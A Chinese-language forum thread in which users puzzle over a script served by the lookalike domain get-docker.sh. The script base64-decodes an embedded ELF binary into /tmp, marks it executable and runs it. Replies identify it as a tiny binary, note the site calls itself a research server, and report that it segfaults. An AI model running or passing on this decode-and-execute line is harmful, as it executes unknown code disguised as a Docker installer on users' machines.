
网址是 http://get-docker.sh,打开后跳转到 http://blin.gg/get-docker.sh,返回以下代码:
#!/bin/bash
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==> /tmp/out; chmod +x /tmp/out; /tmp/out
有谁知道这是要做什么?
1
bbsingao 2024 年 9 月 11 日
base64 -d <<< f0VMRv/A/8exBUjB4TDrBAIAPgCyA+sdBAABAAAABQAaAAAAAAAAAAAAAAABAAAABQAAsDy+OAABAEgBzusLAAAASAHO6wsAAABIg+43DwXr4Q==
ELF���DZH��0�>����<�8H�� H�� H��7�� 竟然是个二进制, |
2
swulling 2024 年 9 月 11 日
为啥会想到搜索 get-docker.sh ?不应该搜索 Docker installation script 么。
|
3
Tink PRO 是个二进制
ELF���DZH��0�>���<�8H�� H�� H��7��% |
4
hingle 2024 年 9 月 11 日
这么短的二进制,执行了什么操作,有没有懂的?
|
5
woyao 2024 年 9 月 11 日
从域名存活历史来看,有好几年了。
域名根目录下还有一个文件 dominion.elf 但是看了一下吧,应该是 Flare-On 2020: break get-docker.sh 似乎不完整…… 直接访问根域名吧,提示 !!! This is a research server !!! |
6
body007 2024 年 9 月 11 日
|
8
a33291 2024 年 9 月 11 日
|
9
zwzwzwzwzxt 2024 年 9 月 11 日
|
10
nagisaushio 2024 年 9 月 11 日
跑起来直接 segfault 了
|